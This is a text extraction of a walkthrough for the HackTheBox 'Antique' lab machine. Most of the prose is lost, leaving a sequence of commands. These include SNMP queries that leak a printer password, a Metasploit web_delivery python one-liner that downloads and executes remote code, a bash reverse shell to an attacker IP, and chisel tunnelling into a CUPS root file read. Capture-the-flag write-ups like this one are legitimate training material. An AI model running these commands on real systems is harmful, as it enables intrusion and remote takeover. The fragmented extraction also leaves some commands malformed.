Download as pdf or txt
Download as pdf or txt
You are on page 1of 19

Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.

in/antique-hackthebox-walkthrough/

1 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

1. nmap -p- -sV 10.129.33.36

2 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

1. searchsploit HP JetDirect
2. searchsploit -m 22319
3. cat 22319.txt

3 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

1. nmap -sU -sV -p 161 10.129.33.36

4 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

1. snmpget -v 1 -c public 10.129.33.36 .1.3.6.1.4.1.11.2.3.9.1.1.13.0

1. P@ssw0rd@123!!123

5 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

1. use multi/script/web_delivery
2. set lhost 10.10.14.93

6 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

3. set srvhost 10.10.14.93


4. exploit
5. python3 -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}
[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://10.10.14.93:8080
/CzrKiV54o7', context=ssl._create_unverified_context());exec(r.read());"

7 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

1. portfwd add -l 8082 -p 631 -r 127.0.0.1

8 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

1. use post/multi/escalate/cups_root_file_read
2. set session 1
3. set file /root/root.txt

9 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

10 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

1. gunzip chisel_1.7.7_linux_amd64.gz
2. python3 -m http.server 80

1. chmod 777 chisel_1.7.7_linux_amd64.gz


2. ./ chisel_1.7.7_linux_amd64.gz server -p 5000 --reverse

11 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

1. telnet 10.129.33.36

1. Nc -nlvp 1234

1. exec bash -c 'bash -i >& /dev/tcp/10.10.14.93/1234 0>&1'

1. wget 10.10.14.93/chisel_1.7.7_linux_amd64

12 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

1. ./chisel_1.7.7_linux_amd64 client 10.10.14.93:5000 R:5432:localhost:631

13 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

14 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

Tweets from @hackinarticles

Hacking Articles
@hackinarticles · 8h

Network Penetration Testing Course (Online)

Hurry up, get enrolled yourself with IGNITE TECHNOLOGIES’ fully exclusive Training
Program “Network Pen-testing Advance Cybersecurity Training Program.”

Hurry UP, Register Now!


bit.ly/ignitetechnolo…

#infosec #cybersecurity

32

Hacking Articles
@hackinarticles · 8h

Pic of the Day

#infosec #cybersecurity #cybersecuritytips #pentesting #cybersecurityawareness


#informationsecurity

16 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

17 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

18 of 19 5/11/2023, 10:43 AM
Antique HackTheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/antique-hackthebox-walkthrough/

19 of 19 5/11/2023, 10:43 AM

You might also like